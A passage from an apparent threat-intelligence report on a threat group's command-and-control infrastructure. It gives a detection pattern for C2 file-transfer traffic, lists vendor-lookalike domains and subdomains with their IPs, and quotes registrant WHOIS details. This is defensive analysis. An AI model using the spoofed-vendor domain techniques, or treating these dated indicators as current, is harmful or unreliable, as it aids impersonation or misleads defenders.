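The download request carries no Content-Type, so the typo check alone would miss half the file-transfer traffic; pairing the User-Agent with the /images/<n>.asmx? URI shape covers that direction, while the User-Agent by itself should not be alerted on, since it imitates a common browser string.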
C2 Infrastructure
I was able to determine several additional subdomains and domain names used by this particular threat group based upon IP telemetry and similar domain parking techniques. The actor typically set only the "www" subdomain to resolve to a legitimate Microsoft IP address so basic browser-based checking of the domain would appear benign.
Additional Active and Parked Subdomains:
{CENSORED}.norton-update.com     255.255.255.255
download.norton-update.com       64.62.184.144
{CENSORED}.norton-update.com     64.62.184.144
support.norton-update.com        64.62.184.144
tsrvall.norton-update.com        64.62.184.144
{CENSORED}.microsoft-centre.com  255.255.255.255
office.microsoft-centre.com      64.62.184.144
o.microsoft-centre.com           192.154.96.153
v.microsoft-centre.com           255.255.255.255
www.microsoft-centre.com         64.4.11.42
The two domains utilized in the sample above used distinct registrant information and email addresses for each domain. Both domains were registered earlier this year at different times which suggests a departure from earlier registration techniques.
WHOIS information:
Domain Name: norton-update.com
Registration Date: March 12, 2013
Registrant Contact: mikemike
Email Address: mike.mike4789@gmail.com
Address: L.A. L.A. Araucanía,432610 CL
Telephone: +56.03478673201

Domain Name: microsoft-centre.com
Registration Date: February 19, 2013
Registrant Contact: wei zhang
Registrant Organization: zhang wei
Email Address: mmhl@263.com
Address: Qing Se Xiao Qu 5Dong 404 cheng du SC 314455 CN
Telephone: 14532151311
I also found several older domains, which were all registered with the email address "huamulan2011@yahoo.com" in October of 2012 and 2011. I’ve intentionally removed subdomains specific to victim organizations.
all.mssupports.com        64.62.184.144
ohare.mssupports.com      255.255.255.255
orlando.mssupports.com    0.0.0.0
srv01.mssupports.com      64.62.184.144
update.mssupports.com     0.0.0.0
www.mssupports.com        64.4.11.37
support.mcaupdate.com     64.62.184.144
www.mcaupdate.com         64.62.184.144
support.mseupdate.com     64.62.184.144
www.mseupdate.com         65.55.81.30